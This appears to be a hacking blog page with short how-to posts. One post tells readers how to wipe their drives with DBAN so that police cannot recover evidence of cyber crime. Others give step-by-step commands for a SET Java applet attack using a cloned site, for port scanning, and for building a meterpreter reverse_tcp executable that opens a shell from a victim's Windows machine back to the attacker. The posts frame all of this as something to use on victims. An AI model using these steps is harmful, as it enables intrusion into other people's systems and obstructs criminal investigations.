When cops are at your door step!

When it comes to a cyber crime evidence can decide whether you will end up in a jail or walk out of the case with ease. From our past experience we have learned that just by deleting the files you can't undo what you have done and there are methods and tools to retrieve deleted data. Thus we decide to find out a way to delete everything which can help the investigators to prove you are guilty. DBAN(Darik's Boot and Nuke) is a Linux distribution which is designed to erase all the memory and traces of it from the drive. It is a self-contained boot image that securely wipes the hard disks of most computers. DBAN is appropriate for bulk or emergency data destruction.

 How to?

  1. Download the ISO file and created a boot-able CD or drive.
  2.  Now once you are done Plug the drive or the CD in your PC and restart it.
  3. Now once DBAN boots up then type autonuke or quick and hit enter.
  4.  Your disks will be wiped clean.

Note:-
Autonuke will delete the ISO burned on the the disk as well if you are using a pen-drive. You can hit F3 to get the list of all the commands....
Posted by No comments :

Java applet attack with SET

All browsers run  java applet which can be used to gain access to the system. The beauty of such attacks are that the exploit code never touches the disk so such an attack can't be detected by the antivirus. Except Mac all the operating systems are vulnerable to such attacks.

 How to?

  1. Open the terminal and then type service postgresql start & hit enter and then type service metasploit start & hit enter.
  2. Now after you are connected then type setoolkit & hit enter.
  3. Now select the option 1 and hit enter.
  4. Now select the option 2 which is website attack vectors and hit enter.
  5. Now select the option 1 which is the java applet one and hit enter.
  6. Now hit 2 which is site cloner and enter.And enter your ip address (remember the Ethernet one).
  7. Now according to your target select your payload and backdoor.
  8. Now on another terminal type msfconsole and hit enter the type use exploit/multi/handler and hit enter and now set the payload with the set payload command and port and ip with the set command and start the multi listener.



Note:- 
When the user goes to the link he/she will be be prompted with a message shown below till he or she clicks install.


Posted by No comments :

Port Scan:The easy way

Port scanning is a technique to scan a system for open ports which can be used for exploitation. This can be considered the first step for hacking. This process can be sometime more technical but we would like you to learn the easy way to do it.

How to?
Android:-
  1. In Fing, you can scan the ports just by selecting the host machine and then Service Scan.
  2. In Landroid, you can select port scan and then entering the ip of the target and then selecting Go.
  3. In Dsploit, you can select the host then select port scanner.
Kali Linux:-
  1. Open the terminal then type zenmap (GUI for nmap) and hit enter.
  2. Now in the target box type the target's ip and then select the scan type then hit scan.

Note:- If the system detects the scan or the port discovery is off then you will not get the results. 
Posted by No comments :

Hacking window machines

Hacking windows computers have always been the first thing which you want to learn when you go into penetration testing as 3 of every 5 computers in the world are running windows on it. We don't intend to harm the reputation of Microsoft but hacking a windows computer that doesn't have any protection from any third party software is quite easy.

What you need?  
Kali Linux on VMware.. 

How to?
  1. Open a new terminal window type ifconfig and hit enter. Note down the eth0 IP address.
  2. Now type  msfpayload windows/meterpreter/reverse_tcp lhost=ip x > hcak.exe and hit enter. You can change the file name to anything you want instead of hcak.exe. 
  3. Now type service postgresql start and hit enter then type service metasploit start and hit enter.
  4. Now type msfconsole and hit enter.
  5. Now type use exploit/multi/handler and hit enter & after that type set payload windows/meterpreter/reverse_tcp to set the payload for the meterpreter.
  6. Now set the lhost by typing set lhost ip. And then exploit and hit enter.
  7. Now wait tell the victim runs the exe file and then you can connect to the victim.

Note:-
If the victim is protected with any fairly good antivirus then this method will fail.
Posted by No comments :
Subscribe to: Posts ( Atom )